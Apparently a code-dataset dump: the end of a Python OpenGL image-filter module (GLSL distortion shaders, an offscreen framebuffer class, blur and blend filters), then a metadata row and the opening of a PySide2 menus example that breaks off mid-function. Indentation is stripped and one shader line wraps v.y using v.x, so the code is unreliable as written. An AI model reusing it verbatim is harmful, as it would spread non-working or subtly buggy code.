# For most effects, pixels are not wrapped around the edges.
# The second version wraps, with respect to the extent of the actual image in its power-of-2 texture.
# The third version wraps with a flipped image (transition).
glsl_wrap = (
'''vec4 p = (v.x < 0.0 || v.y < 0.0 || v.x > 0.999 || v.y > 0.999)? vec4(0.0) : texture2D(src, v);''',
'''
v.x = (v.x >= extent.x - 0.001)? mod(v.x, extent.x) - 0.002 : max(v.x, 0.001);
v.y = (v.y >= extent.y - 0.001)? mod(v.x, extent.x) - 0.002 : max(v.y, 0.001);
vec4 p = texture2D(src, v);'''.strip(),
'''
v.x = (v.x >= extent.x - 0.001)? (extent.x - (v.x-extent.x)) - 0.002 : max(v.x, 0.001);
v.y = (v.y >= extent.y - 0.001)? (extent.y - (v.y-extent.y)) - 0.002 : max(v.y, 0.001);
vec4 p = texture2D(src, v);'''.strip())
_distortion = {}
_distortion[BUMP] = 'r = r * smoothstep(i, m, r);'
_distortion[DENT] = 'r = 2.0 * r - r * smoothstep(0.0, m, r/i);'
_distortion[PINCH] = 'r = pow(r, m/i) * m;'
_distortion[FISHEYE] = 'r = r * r / sqrt(2.0);'
_distortion[SPLASH] = 'if (r > m) r = m;'
_distortion[TWIRL] = 'phi = phi + (1.0 - smoothstep(-m, m, r)) * i;'
_distortion[MIRROR] = '''
if (m > 0.0) { n.x += offset.x * extent.x * ratio; n.x = n.x * sign(n.x); }
if (i > 0.0) { n.y += offset.y * extent.y; n.y = n.y * sign(n.y); }
'''.strip()
_distortion[STRETCH] = '''
vec2 s = sign(n);
n = abs(n);
n = (1.0-i) * n + i * smoothstep(m*0.25, m, n) * n;
n = s * n;
'''.strip()
for f in (BUMP, DENT, PINCH, FISHEYE, SPLASH, TWIRL):
_distortion[f] = shader(fragment=glsl_distortion % (glsl_polar % _distortion[f], glsl_wrap[0]))
for f in (STRETCH, MIRROR):
_distortion[f] = shader(fragment=glsl_distortion % ( _distortion[f], glsl_wrap[2]))
class Distortion(Filter):
def __init__(self, effect, texture, dx=0, dy=0, m=1.0, i=1.0):
""" Distortion filter with dx, dy offset from the center (between -0.5 and 0.5),
magnitude m as the radius of effect, intensity i as the depth of the effect.
"""
self.shader = _distortion[effect]
self.texture = texture
self.dx = dx
self.dy = dy
self.m = m
self.i = i
# Center offset can also be set in absolute coordinates (e.g. pixels):
def _get_abs_dx(self):
return int(self.dx * self.texture.width)
def _get_abs_dy(self):
return int(self.dy * self.texture.height)
def _set_abs_dx(self, v):
self.dx = float(v) / self.texture.width
def _set_abs_dy(self, v):
self.dy = float(v) / self.texture.height
abs_dx = property(_get_abs_dx, _set_abs_dx)
abs_dy = property(_get_abs_dy, _set_abs_dy)
def push(self):
w = float(self.texture.width)
h = float(self.texture.height)
w2 = float(ceil2(w))
h2 = float(ceil2(h))
self.shader.set("extent", vec2(w/w2, h/h2))
self.shader.set("offset", vec2(float(2*self.dx), float(2*self.dy)))
self.shader.set("ratio", w2/h2)
self.shader.set("m", float(self.m))
self.shader.set("i", float(self.i))
self.shader.push()
#=====================================================================================================
#--- FRAME BUFFER OBJECT -----------------------------------------------------------------------------
# Based on "Frame Buffer Object 101" (2006), Rob Jones,
# http://www.gamedev.net/reference/articles/article2331.asp
_UID = 0
def _uid():
# Each FBO has a unique ID.
global _UID; _UID+=1; return _UID;
def _texture(width, height):
# Returns an empty texture of the given width and height.
return Texture.create(width, height)
def glCurrentViewport(x=None, y=None, width=None, height=None):
""" Returns a (x, y, width, height)-tuple with the current viewport bounds.
If x, y, width and height are given, set the viewport bounds.
"""
# Why? To switch between the size of the onscreen canvas and the offscreen buffer.
# The canvas could be 256x256 while an offscreen buffer could be 1024x1024.
# Without switching the viewport, information from the buffer would be lost.
if x is not None and y is not None and width is not None and height is not None:
glViewport(x, y, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(x, width, y, height, -1, 1)
glMatrixMode(GL_MODELVIEW)
xywh = (GLint*4)(); glGetIntegerv(GL_VIEWPORT, xywh)
return tuple(xywh)
# The FBO stack keeps track of nested FBO's.
# When OffscreenBuffer.pop() is called, we revert to the previous buffer.
# Usually, this is the onscreen canvas, but in a render() function that contains
# filters or nested render() calls, this is the previous FBO.
_FBO_STACK = []
class OffscreenBufferError(Exception):
pass
class OffscreenBuffer(object):
def __init__(self, width, height):
""" "FBO" is an OpenGL extension to do "Render to Texture", drawing in an offscreen buffer.
It is useful as a place to chain multiple shaders,
since each shader has its own program and we can only install one program at a time.
"""
self.id = c_uint(_uid())
try: glGenFramebuffersEXT(1, byref(self.id))
except:
raise OffscreenBufferError, "offscreen buffer not supported."
self.texture = None
self._viewport = (None, None, None, None) # The canvas bounds, set in OffscreenBuffer.push().
self._active = False
self._init(width, height)
#self._init_depthbuffer()
def _init(self, width, height):
self.texture = _texture(int(width), int(height))
@property
def width(self):
return self.texture.width
@property
def height(self):
return self.texture.height
@property
def active(self):
return self._active
def push(self):
""" Between push() and pop(), all drawing is done offscreen in OffscreenBuffer.texture.
The offscreen buffer has its own transformation state,
so any translate(), rotate() etc. does not affect the onscreen canvas.
"""
_FBO_STACK.append(self)
glBindTexture(self.texture.target, self.texture.id)
glBindFramebufferEXT(GL_FRAMEBUFFER_EXT, self.id.value)
glFramebufferTexture2DEXT(
GL_FRAMEBUFFER_EXT,
GL_COLOR_ATTACHMENT0_EXT,
self.texture.target,
self.texture.id,
self.texture.level
)
# FBO's can fail when not supported by the graphics hardware,
# or when supplied an image of size 0 or unequal width/height.
# Check after glBindFramebufferEXT() and glFramebufferTexture2DEXT().
if glCheckFramebufferStatusEXT(GL_FRAMEBUFFER_EXT) != GL_FRAMEBUFFER_COMPLETE_EXT:
msg = self.texture.width == self.texture.height == 0 and "width=0, height=0." or ""
raise OffscreenBufferError, msg
# Separate the offscreen from the onscreen transform state.
# Separate the offscreen from the onscreen canvas size.
self._viewport = glCurrentViewport()
glPushMatrix()
glLoadIdentity()
glCurrentViewport(0, 0, self.texture.width, self.texture.height)
glColor4f(1.0,1.0,1.0,1.0)
# FBO's work with a simple GL_LINE_SMOOTH anti-aliasing.
# The instructions on how to enable framebuffer multisampling are pretty clear:
# (http://www.opengl.org/wiki/GL_EXT_framebuffer_multisample)
# but glRenderbufferStorageMultisampleEXT doesn't appear to work (yet),
# plus there is a performance drop.
glEnable(GL_LINE_SMOOTH)
# Blending transparent images in a transparent FBO is a bit tricky
# because alpha is premultiplied, an image with 50% transparency
# will come out 25% transparency with glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA).
# http://www.opengl.org/discussion_boards/ubbthreads.php?ubb=showflat&Number=257630
# http://www.openframeworks.cc/forum/viewtopic.php?f=9&t=2215
# This blend mode gives better results:
glEnable(GL_BLEND)
glBlendFuncSeparate(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
self._active = True
def pop(self):
""" Reverts to the onscreen canvas.
The contents of the offscreen buffer can be retrieved with OffscreenBuffer.texture.
"""
# Switch to onscreen canvas size and transformation state.
# Switch to onscreen canvas.
# Reset to the normal blending mode.
_FBO_STACK.pop(-1)
glCurrentViewport(*self._viewport)
glPopMatrix()
glBindFramebufferEXT(GL_FRAMEBUFFER_EXT, _FBO_STACK and _FBO_STACK[-1].id or 0)
glBlendFuncSeparate(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
#glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self._active = False
def render(self):
""" Executes the drawing commands in OffscreenBuffer.draw() offscreen and returns image.
This is useful if you have a class that inherits from FBO with a draw() method.
"""
self.push()
self.draw()
self.pop()
return self.texture
def draw(self):
pass
def slice(self, x, y, width, height):
""" Returns a portion of the offscreen buffer as an image.
"""
return self.texture.get_region(x, y, width, height)
def reset(self, width=None, height=None):
""" Resizes the offscreen buffer by attaching a new texture to it.
This will destroy the contents of the previous buffer.
If you do not explicitly reset the buffer, the contents from previous drawing
between OffscreenBuffer.push() and OffscreenBuffer.pop() is retained.
"""
if self._active:
raise OffscreenBufferError, "can't reset offscreen buffer when active"
if width is None:
width = self.width
if height is None:
height = self.height
self._init(width, height)
def clear(self):
glClear(GL_COLOR_BUFFER_BIT)
glClear(GL_DEPTH_BUFFER_BIT)
glClear(GL_STENCIL_BUFFER_BIT)
def _init_depthbuffer(self):
self._depthbuffer = c_uint(_uid())
glGenRenderbuffersEXT(1, byref(self._depthbuffer))
glBindRenderbufferEXT(GL_RENDERBUFFER_EXT, self._depthbuffer)
glRenderbufferStorageEXT(GL_RENDERBUFFER_EXT, GL_DEPTH_COMPONENT, self.width, self.height)
glFramebufferRenderbufferEXT(
GL_FRAMEBUFFER_EXT,
GL_DEPTH_ATTACHMENT_EXT,
GL_RENDERBUFFER_EXT,
self._depthbuffer
)
def __del__(self):
try:
if glDeleteFramebuffersEXT:
glDeleteFramebuffersEXT(1, self.id)
if glDeleteRenderbuffersEXT and hasattr(self, "_depthbuffer"):
glDeleteRenderbuffersEXT(1, self._depthbuffer)
except:
pass
FBO = OffscreenBuffer
#=====================================================================================================
#--- OFFSCREEN RENDERING -----------------------------------------------------------------------------
# Uses an offscreen buffer to render filters and drawing commands to images.
try:
_buffer = OffscreenBuffer(640, 480)
except OffscreenBufferError:
_buffer = None
from context import Image, texture
def filter(img, filter=None, clear=True):
""" Returns a new Image object with the given filter applied to it.
- img : an image that can be passed to the image() command.
- filter: an instance of the Filter class, with parameters set.
- clear : if True, clears the contents of the offscreen buffer and resizes it to the image.
"""
# For file paths, textures and Pixel objects, create an Image first.
if not isinstance(img, Image):
img = Image(img)
# Reuse main _buffer when possible, otherwise create one on the fly
# (this will be necessary when filter() or render() is nested inside render()).
if not _buffer or _buffer.active:
buffer = OffscreenBuffer(img.texture.width, img.texture.height)
elif clear:
buffer = _buffer
buffer.reset(img.texture.width, img.texture.height)
else:
buffer = _buffer
buffer.push()
if filter != None:
filter.texture = img.texture # Register the current texture with the filter.
filter.push()
# This blend mode gives better results for transparent images:
glBlendFuncSeparate(GL_ONE, GL_ONE_MINUS_SRC_ALPHA, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
# Note: Image.alpha and Image.color attributes won't work here,
# because the shader overrides the default drawing behavior.
# Instead, add the transparent() and colorize() filters to the chain.
img.draw(0, 0)
if filter != None:
filter.pop()
buffer.pop()
return img.copy(texture=buffer.texture)
class RenderedImage(Image):
def draw(self, *args, **kwargs):
# Textures rendered in the FBO look slightly washed out.
# The render() command yields a RenderedImage object,
# which draw() method uses a blending trick to correct the colors:
glBlendFunc(GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
Image.draw(self, *args, **kwargs)
glBlendFuncSeparate(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
def save(self, path):
# XXX Colors will appear washed out in the exported image.
Image.save(self, path)
def render(function, width, height, clear=True, **kwargs):
""" Returns an Image object from a function containing drawing commands (i.e. a procedural image).
This is useful when, for example, you need to render filters on paths.
- function: a function containing drawing commands.
- width : width of the offscreen canvas.
- height : height of the offscreen canvas.
- clear : when False, retains the contents of the offscreen canvas, without resizing it.
"""
# Reuse main _buffer when possible, otherwise create one on the fly
# (this will be necessary when render() is nested inside another render()).
if not _buffer or _buffer.active:
buffer = OffscreenBuffer(width, height)
elif clear:
buffer = _buffer
buffer.reset(width, height)
else:
buffer = _buffer
buffer.push()
function(**kwargs)
buffer.pop()
return RenderedImage(buffer.texture)
#--- OFFSCREEN FILTERS -------------------------------------------------------------------------------
# Images are rendered offscreen with the filter applied, and the new image returned.
def invert(img):
""" Returns an image with inverted colors (e.g. white becomes black).
"""
return filter(img, Invert(img.texture))
def solid(width, height, fill=(0,0,0,0)):
""" Generates an image filled with a solid color.
"""
clr = tuple([int(v*255) for v in fill])
return Image(SolidColorImagePattern(clr).create_image(width, height).get_texture())
def gradient(width, height, clr1=(0,0,0,1), clr2=(1,1,1,1), type=LINEAR):
""" Generates a gradient image and returns it.
- width : the width of the image.
- height: the height of the image.
- clr1 : a Color (or a tuple) that defines the bottom (or inner) color.
- clr2 : a Color (or a tuple) that defines the top (or outer) color.
- type : either LINEAR or RADIAL.
"""
f = type==LINEAR and LinearGradient or RadialGradient
img = Image(_texture(ceil2(width), ceil2(height)))
img = filter(img, f(img.texture, vec4(*clr1), vec4(*clr2)))
# Reuse main _buffer when possible, otherwise create one on the fly
# (this will be necessary when filter() or render() is nested inside render()).
if not _buffer or _buffer.active:
buffer = OffscreenBuffer(img.texture.width, img.texture.height)
else:
buffer = _buffer
# If the given dimensions are not power of 2,
# scale down the gradient to the given dimensions.
if width != img.width or height != img.height:
buffer.reset(width, height)
buffer.push()
img.width = width
img.height = height
img.draw()
buffer.pop()
return img.copy(texture=buffer.texture)
return img
def colorize(img, color=(1,1,1,1), bias=(0,0,0,0)):
""" Applies a colorize filter to the image and returns the colorized image.
- color: a Color (or a tuple) of RGBA-values to multiply with each image pixel.
- bias : a Color (or a tuple) of RGBA-values to add to each image pixel.
"""
return filter(img, Colorize(img.texture, vec4(*color), vec4(*bias)))
def adjust(img, brightness=1.0, contrast=1.0, saturation=1.0, hue=0.0):
""" Applies color adjustment filters to the image and returns the adjusted image.
- brightness: the overall lightness or darkness (0.0 is a black image).
- contrast : the difference in brightness between regions.
- saturation: the intensity of the colors (0.0 is a grayscale image).
- hue : the shift in hue (1.0 is 360 degrees on the color wheel).
"""
if brightness != 1: img = filter(img.texture, BrightnessAdjustment(img, brightness))
if contrast != 1: img = filter(img.texture, ContrastAdjustment(img, contrast))
if saturation != 1: img = filter(img.texture, SaturationAdjustment(img, saturation))
if hue != 0: img = filter(img.texture, HueAdjustment(img, hue))
return img
def desaturate(img):
""" Returns a grayscale version of the image.
"""
return filter(img, SaturationAdjustment(img, 0.0))
grayscale = desaturate
def brightpass(img, threshold=0.3):
""" Applies a bright pass filter, where pixels whose luminance falls below the threshold are black.
"""
return filter(img, BrightPass(img.texture, threshold))
def blur(img, kernel=5, scale=1.0, amount=1, cumulative=False):
""" Applies a blur filter to the image and returns the blurred image.
- kernel: the size of the convolution matrix (e.g. 9 = 9x9 convolution kernel).
- scale : the radius of the effect, a higher scale will create a rougher but faster blur.
- amount: the number of the times to apply the blur filter;
because blurred layers are pasted on top of each other cumulatively
this produces a nicer effect than repeatedly using blur() in a for-loop
(which blurs the blurred).
"""
for i in range(amount):
clear = i==0 or not cumulative
img = filter(img, HorizontalBlur(img.texture, kernel, scale), clear=clear)
img = filter(img, VerticalBlur(img.texture, kernel, scale), clear=clear)
return img
def transparent(img, alpha=1.0):
""" Returns a transparent version of the image.
- alpha: the percentage of the original opacity of the image (0.0-1.0).
"""
return filter(img, AlphaTransparency(img.texture, alpha))
def _q(img):
# For images functioning as masks or blend layers,
# apply any quad distortian and then use the texture of the distored image.
if img.quad != (0,0,0,0,0,0,0,0):
return filter(img)
return img
def mask(img1, img2, alpha=1.0, dx=0, dy=0):
""" Applies the second image as an alpha mask to the first image.
The second image must be a grayscale image, where the black areas
make the first image transparent (e.g. punch holes in it).
- dx: horizontal offset (in pixels) of the alpha mask.
- dy: vertical offset (in pixels) of the alpha mask.
"""
return filter(img1, AlphaMask(img1.texture, _q(img2).texture, alpha, dx, dy))
def blend(img1, img2, mode=OVERLAY, alpha=1.0, dx=0, dy=0):
""" Applies the second image as a blend layer with the first image.
- dx: horizontal offset (in pixels) of the blend layer.
- dy: vertical offset (in pixels) of the blend layer.
"""
return filter(img1, Blend(mode, img1, _q(img2).texture, alpha, dx, dy))
def add(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(ADD, img1, _q(img2).texture, alpha, dx, dy))
def subtract(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(SUBTRACT, img1, _q(img2).texture, alpha, dx, dy))
def lighten(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(LIGHTEN, img1, _q(img2).texture, alpha, dx, dy))
def darken(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(DARKEN, img1, _q(img2).texture, alpha, dx, dy))
def multiply(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(MULTIPLY, img1, _q(img2).texture, alpha, dx, dy))
def screen(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(SCREEN, img1, _q(img2).texture, alpha, dx, dy))
def overlay(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(OVERLAY, img1, _q(img2).texture, alpha, dx, dy))
def hardlight(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(HARDLIGHT, img1, _q(img2).texture, alpha, dx, dy))
def hue(img1, img2, alpha=1.0, dx=0, dy=0):
return filter(img1, Blend(HUE, img1, _q(img2).texture, alpha, dx, dy))
def glow(img, intensity=0.5, amount=1):
""" Returns the image blended with a blurred version, yielding a glowing effect.
- intensity: the opacity of the blur (0.0-1.0).
- amount : the number of times to blur.
"""
b = blur(img, kernel=9, scale=1.0, amount=max(1, amount))
return add(img, b, alpha=intensity)
def bloom(img, intensity=0.5, amount=1, threshold=0.3):
""" Returns the image blended with a blurred brightpass version, yielding a "magic glow" effect.
- intensity: the opacity of the blur (0.0-1.0).
- amount : the number of times to blur.
- threshold: the luminance threshold of pixels that light up.
"""
b = brightpass(img, threshold)
b = blur(b, kernel=9, scale=1.0, amount=max(1, amount))
return add(img, b, alpha=intensity)
def distortion_mixin(type, dx, dy, **kwargs):
# Each distortion filter has specific parameters to tweak the effect (usually radius and zoom).
# Returns the magnitude m and intensity i from the keyword arguments,
# which are the parameters expected by the Distortion Filter class.
if type == BUMP:
m = kwargs.get("radius", 0.5)
i = lerp(-m*20, m*0.25, max(0, kwargs.get("zoom", 0.5))**0.1)
elif type == DENT:
m = max(0, 2 * kwargs.get("radius", 0.5))
i = max(0, 1 * kwargs.get("zoom", 0.5))
elif type == PINCH:
m = 1.0
i = max(0.2, 2 * kwargs.get("zoom", 0.75))
elif type == TWIRL:
m = kwargs.get("radius", 1.0)
i = radians(kwargs.get("angle", 180.0))
elif type == SPLASH:
m = kwargs.get("radius", 0.5)
i = 0
elif type == MIRROR:
m = int(kwargs.get("horizontal", True))
i = int(kwargs.get("vertical", True))
dx = clamp(dx, -0.5, 1.5)
dy = clamp(dy, -0.5, 1.5)
elif type == STRETCH:
m = max(0, kwargs.get("radius", 0.5))
i = max(0, min(1, 0.5 * kwargs.get("zoom", 1.0)))
else:
m = 0.5
i = 0.5
return dx, dy, m, i
#def bump(img, dx=0.5, dy=0.5, radius=0.5, zoom=0.5)
def bump(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a bump distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- radius: the radius of the affected area, proportional to the image size.
- zoom: the amount to zoom in.
"""
dx, dy, m, i = distortion_mixin(BUMP, dx, dy, **kwargs)
return filter(img, filter=Distortion(BUMP, img, dx-0.5, dy-0.5, m, i))
#def dent(img, dx=0.5, dy=0.5, radius=0.5, zoom=0.5)
def dent(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a dent distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- radius: the radius of the affected area, proportional to the image size.
- zoom: the amount to zoom in.
"""
dx, dy, m, i = distortion_mixin(DENT, dx, dy, **kwargs)
return filter(img, filter=Distortion(DENT, img, dx-0.5, dy-0.5, m, i))
#def pinch(img, dx=0.5, dy=0.5, zoom=0.75)
def pinch(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a pinch distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- zoom: the amount of bulge (0.1-0.5) or pinch (0.5-1.0):
"""
dx, dy, m, i = distortion_mixin(PINCH, dx, dy, **kwargs)
return filter(img, filter=Distortion(PINCH, img, dx-0.5, dy-0.5, m, i))
#def twirl(img, dx=0.5, dy=0.5, radius=1.0, angle=180.0)
def twirl(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a twirl distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- radius: the radius of the effect, proportional to the image size.
- angle: the amount of rotation in degrees.
"""
dx, dy, m, i = distortion_mixin(TWIRL, dx, dy, **kwargs)
return filter(img, filter=Distortion(TWIRL, img, dx-0.5, dy-0.5, m, i))
#def splash(img, dx=0.5, dy=0.5, radius=0.5)
def splash(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a light-tunnel distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- radius: the radius of the unaffected area, proportional to the image size.
"""
dx, dy, m, i = distortion_mixin(SPLASH, dx, dy, **kwargs)
return filter(img, filter=Distortion(SPLASH, img, dx-0.5, dy-0.5, m, i))
#def stretch(img, dx=0.5, dy=0.5, radius=0.5, zoom=1.0)
def stretch(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image with a zoom box distortion applied to it.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- radius: the radius of the affected area, proportional to the image size.
- zoom: the amount to zoom in (0.0-2.0, where 1.0 means 1x zoomed in, or 200%).
"""
dx, dy, m, i = distortion_mixin(STRETCH, dx, dy, **kwargs)
return filter(img, filter=Distortion(STRETCH, img, dx-0.5, dy-0.5, m, i))
#def mirror(img, dx=0.5, dy=0.5, horizontal=True, vertical=True)
def mirror(img, dx=0.5, dy=0.5, **kwargs):
""" Returns the image mirrored along horizontal axis dx and vertical axis dy.
- dx: horizontal origin of the effect, between 0.0 and 1.0.
- dy: vertical origin of the effect, between 0.0 and 1.0.
- horizontal: when True, mirrors the image horizontally.
- vertical : when True, mirrors the image vertically.
"""
dx, dy, m, i = distortion_mixin(MIRROR, dx, dy, **kwargs)
return filter(img, filter=Distortion(MIRROR, img, dx-0.5, dy-0.5, m, i))
def dropshadow(img, alpha=0.5, amount=2):
""" Returns a blurred and grayscale version of the image.
If filters are not supported, returns a grayscale version without blur (using Image.color).
"""
if not SUPPORTED:
t = texture(img)
else:
t = blur(img, kernel=5, amount=amount).texture
img = isinstance(img, Image) and img.copy(t) or Image(t)
img.color.rgba = (0,0,0, alpha)
return img
#--- ONSCREEN FILTERS --------------------------------------------------------------------------------
# These can be used directly as filter parameter for the image() command.
# This may be faster because no offscreen buffer is used to render the effect.
def inverted():
return Invert(None)
def colorized(color=(1,1,1,1), bias=(0,0,0,0)):
return Colorize(None, vec4(*color), vec4(*bias))
def adjusted(mode, v):
if mode == BRIGHTNESS:
return BrightnessAdjustment(None, v)
if mode == CONTRAST:
return ContrastAdjustment(None, v)
if mode == SATURATION:
return SaturationAdjustment(None, v)
if mode == HUE:
return HueAdjustment(None, v)
def desaturated():
return SaturationAdjustment(None, 0.0)
def blurred(scale=1.0):
return Gaussian3x3Blur(None, scale)
def masked(img, alpha=1.0, dx=0, dy=0):
return AlphaMask(None, _q(img).texture, alpha, dx, dy)
def blended(mode, img, alpha=1.0, dx=0, dy=0):
return Blend(mode, None, _q(img).texture, alpha, dx, dy)
def distorted(type, dx=0.5, dy=0.5, **kwargs):
dx, dy, m, i = distortion_mixin(type, dx, dy, **kwargs)
return Distortion(type, None, dx-0.5, dy-0.5, m, i) | 39.52576 | 106 | 0.6011 |
d5ad3c70851e4863651dd23249ee7e10155e39d6 | 11,146 | py | Python | pyqt-official/mainwindows/menus.py | a358003542/pyside2_examples | 5f337211e615a726541bf6766455d4f2c9d0f551 | [
"MIT"
] | 1 | 2020-02-11T08:22:28.000Z | 2020-02-11T08:22:28.000Z | pyqt-official/mainwindows/menus.py | a358003542/pyside2_examples | 5f337211e615a726541bf6766455d4f2c9d0f551 | [
"MIT"
] | null | null | null | pyqt-official/mainwindows/menus.py | a358003542/pyside2_examples | 5f337211e615a726541bf6766455d4f2c9d0f551 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
from PySide2.QtCore import Qt
from PySide2.QtGui import QKeySequence
from PySide2.QtWidgets import (QAction, QActionGroup, QApplication, QFrame,
QLabel, QMainWindow, QMenu, QMessageBox, QSizePolicy, QVBoxLayout,
QWidget)
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
widget = QWidget()
self.setCentralWidget(widget)
topFiller = QWidget()
topFiller.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.infoLabel = QLabel(
"<i>Choose a menu option, or right-click to invoke a context menu</i>",
alignment=Qt.AlignCenter)
self.infoLabel.setFrameStyle(QFrame.StyledPanel | QFrame.Sunken)
bottomFiller = QWidget()
bottomFiller.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
vbox = QVBoxLayout()
vbox.setContentsMargins(5, 5, 5, 5)
vbox.addWidget(topFiller)
vbox.addWidget(self.infoLabel)
vbox.addWidget(bottomFiller)
widget.setLayout(vbox)
self.createActions()
self.createMenus()
message = "A context menu is available by right-clicking"
self.statusBar().showMessage(message)
self.setWindowTitle("Menus")
self.setMinimumSize(160,160)
self.resize(480,320)
def contextMenuEvent(self, event):
menu = QMenu(self)
menu.addAction(self.cutAct)
menu.addAction(self.copyAct)
menu.addAction(self.pasteAct)
menu.exec_(event.globalPos())
def newFile(self):
self.infoLabel.setText("Invoked <b>File|New</b>")
def open(self):
self.infoLabel.setText("Invoked <b>File|Open</b>")
def save(self):
self.infoLabel.setText("Invoked <b>File|Save</b>")
def print_(self):
self.infoLabel.setText("Invoked <b>File|Print</b>")
def undo(self):
self.infoLabel.setText("Invoked <b>Edit|Undo</b>")
def redo(self):
self.infoLabel.setText("Invoked <b>Edit|Redo</b>")
def cut(self):
self.infoLabel.setText("Invoked <b>Edit|Cut</b>")
def copy(self):
self.infoLabel.setText("Invoked <b>Edit|Copy</b>")
def paste(self):
self.infoLabel.setText("Invoked <b>Edit|Paste</b>")
def bold(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Bold</b>")
def italic(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Italic</b>")
def leftAlign(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Left Align</b>")
def rightAlign(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Right Align</b>")
def justify(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Justify</b>")
def center(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Center</b>")
def setLineSpacing(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Set Line Spacing</b>")
def setParagraphSpacing(self):
self.infoLabel.setText("Invoked <b>Edit|Format|Set Paragraph Spacing</b>")
def about(self):
self.infoLabel.setText("Invoked <b>Help|About</b>")
QMessageBox.about(self, "About Menu",
"The <b>Menu</b> example shows how to create menu-bar menus "
"and context menus.")
def aboutQt(self):
self.infoLabel.setText("Invoked <b>Help|About Qt</b>")
def createActions(self):
self.newAct = QAction("&New", self, shortcut=QKeySequence.New,
statusTip="Create a new file", triggered=self.newFile)
self.openAct = QAction("&Open...", self, shortcut=QKeySequence.Open,
statusTip="Open an existing file", triggered=self.open)
self.saveAct = QAction("&Save", self, shortcut=QKeySequence.Save,
statusTip="Save the document to disk", triggered=self.save)
self.printAct = QAction("&Print...", self, shortcut=QKeySequence.Print,
statusTip="Print the document", triggered=self.print_)
self.exitAct = QAction("E&xit", self, shortcut="Ctrl+Q",
statusTip="Exit the application", triggered=self.close)
self.undoAct = QAction("&Undo", self, shortcut=QKeySequence.Undo,
statusTip="Undo the last operation", triggered=self.undo)
self.redoAct = QAction("&Redo", self, shortcut=QKeySequence.Redo,
statusTip="Redo the last operation", triggered=self.redo)
